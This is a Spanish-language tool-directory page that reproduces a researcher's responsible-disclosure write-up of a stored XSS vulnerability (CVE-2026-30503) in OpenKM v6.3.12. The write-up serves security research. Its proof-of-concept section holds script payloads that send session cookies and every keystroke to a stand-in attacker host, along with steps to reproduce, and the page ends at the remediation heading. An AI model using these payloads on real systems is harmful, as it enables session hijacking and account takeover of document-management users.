Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Divulgación detallada de CVE-2026-30503, una vulnerabilidad de XSS almacenado en OpenKM v6.3.12. Incluye análisis de causa raíz, cargas útiles PoC, evaluación del impacto y recomendaciones de remediación para investigadores de seguridad y pentesters. | Kitploit
Herramientas/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgación detallada de CVE-2026-30503, una vulnerabilidad de XSS almacenado en OpenKM v6.3.12. Incluye análisis de causa raíz, cargas útiles PoC, evaluación del impacto y recomendaciones de remediación para investigadores de seguridad y pentesters.

Ver Repositorio
8hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2026-30503 — XSS Almacenado en OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Descubierto y reportado por Dharmendra Kumar — Investigador de Seguridad

Ciberseguridad | Pruebas de Penetración | Investigación de Vulnerabilidades | Divulgación Responsable


📌 Tabla de Contenidos

  • Resumen
  • Detalles del CVE
  • Producto Afectado
  • Descripción de la Vulnerabilidad
  • Análisis de Causa Raíz
  • Impacto y Evaluación de Riesgos
  • Prueba de Concepto (PoC)
  • Remediación y Recomendaciones
  • Cronología de Divulgación
  • Referencias
  • Sobre el Investigador

🔍 Resumen

Este repositorio documenta la divulgación responsable de CVE-2026-30503, una vulnerabilidad de Cross-Site Scripting (XSS) Almacenado identificada en OpenKM v6.3.12, un sistema de gestión documental de código abierto ampliamente utilizado en entornos empresariales.

La vulnerabilidad permite a un atacante autenticado inyectar JavaScript malicioso persistente en la aplicación, que se ejecuta en el contexto del navegador de cualquier usuario (incluidos administradores) que posteriormente visualice el contenido afectado.

⚠️ Severidad: Alta | Vector de Ataque: Red | Privilegios Requeridos: Bajos | Interacción del Usuario: Requerida


📋 Detalles del CVE

CampoDetalles
ID CVECVE-2026-30503
ProductoOpenKM
Versión Afectadav6.3.12
Clase de VulnerabilidadCross-Site Scripting Almacenado (XSS)
CWECWE-79: Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
InvestigadorDharmendra Kumar
Tipo de DivulgaciónResponsable / Coordinada

📦 Producto Afectado

OpenKM es un sistema de gestión documental (DMS) gratuito y de código abierto que proporciona una interfaz web para gestionar, auditar y distribuir documentos empresariales. Es utilizado por empresas, organismos gubernamentales e instituciones educativas a nivel global.

  • Nombre del Producto: Sistema de Gestión Documental OpenKM
  • Versión Afectada: v6.3.12
  • Sitio Web del Proveedor: https://www.openkm.com
  • Categoría: Sistema de Gestión Documental (DMS)
  • Lenguaje/Stack: Java (JSP/Spring)

🧨 Descripción de la Vulnerabilidad

Se descubrieron múltiples vulnerabilidades de Cross-Site Scripting (XSS) Almacenado en OpenKM v6.3.12. Un atacante con acceso autenticado de bajos privilegios puede inyectar cargas útiles arbitrarias de JavaScript en uno o más campos de entrada. Estas cargas útiles se almacenan permanentemente en el backend de la aplicación y se ejecutan automáticamente cuando cualquier usuario —incluidos administradores— accede a la página o componente afectado.

A diferencia del XSS Reflejado, que requiere que la víctima haga clic en un enlace manipulado, las cargas útiles del XSS Almacenado están incrustadas en la propia aplicación, lo que las hace significativamente más peligrosas y persistentes.

Endpoint(s) Vulnerable(s)

  • Campos de entrada controlados por el usuario en metadatos de documentos, notas o campos de nombre
  • La aplicación no sanitiza ni codifica la entrada del usuario antes de renderizarla de vuelta al navegador

🔬 Análisis de Causa Raíz

La vulnerabilidad proviene de tres debilidades concurrentes en el pipeline de manejo de entrada de la aplicación:

Entrada del Usuario ──► [SIN Validación] ──► Almacenada en BD ──► [SIN Codificación de Salida] ──► Renderizada en Navegador ──► XSS Ejecutado
DebilidadDescripción
❌ Falta de Validación de EntradaLa aplicación no restringe ni sanitiza caracteres especiales (<, >, ", ', ;) en campos proporcionados por el usuario
❌ Falta de Codificación de SalidaLos valores almacenados se renderizan directamente en HTML sin codificación de entidades HTML
❌ Renderizado DOM InseguroLos datos proporcionados por el usuario se incrustan en el contexto DOM sin CSP ni controles de sanitización

💥 Impacto y Evaluación de Riesgos

Una explotación exitosa de esta vulnerabilidad puede conllevar a:

RiesgoDescripción
🍪 Secuestro de SesiónRobar tokens de sesión autenticados mediante la exfiltración de document.cookie
👤 Toma de CuentaComprometer cuentas de víctimas, incluyendo cuentas de administrador
🔐 Captura de CredencialesInyectar formularios de phishing para capturar credenciales de inicio de sesión
📤 Exfiltración de DatosExtraer silenciosamente documentos o metadatos sensibles del DMS
⚙️ Acciones No AutorizadasRealizar operaciones privilegiadas en nombre de la víctima (eliminar/modificar documentos)
🎯 Apuntar a AdministradoresLa carga útil se ejecuta en el panel de administración cuando un administrador revisa contenido
🔄 Propagación tipo GusanoLa carga útil XSS autorreplicante puede propagarse entre usuarios

🧪 Prueba de Concepto (PoC)

⚠️ Aviso: Este PoC se comparte estrictamente con fines educativos y de investigación en seguridad bajo los principios de divulgación responsable. No utilice esto contra sistemas que no posea o para los que no tenga permiso explícito por escrito para realizar pruebas.

Ejemplo de Carga Útil (Genérica)

// PoC básico — demuestra la ejecución de script
<script>alert('CVE-2026-30503 - XSS por Dharmendra Kumar')</script>

// Exfiltración de token de sesión
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// Inyección de keylogger
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

Pasos para Reproducir

  1. Inicie sesión en OpenKM v6.3.12 con una cuenta autenticada de bajos privilegios
  2. Navegue al campo de entrada vulnerable (ej., metadatos de documento / notas / campo de título)
  3. Inyecte una carga útil XSS como <script>alert(document.cookie)</script>
  4. Guarde / envíe la entrada
  5. Inicie sesión como otro usuario (o administrador) y navegue al recurso afectado
  6. Observe la carga útil JavaScript ejecutándose en el contexto del navegador de la víctima

🛠️ Remediación y Recomendaciones

Para Desarrolladores / Proveedores

Descargar herramienta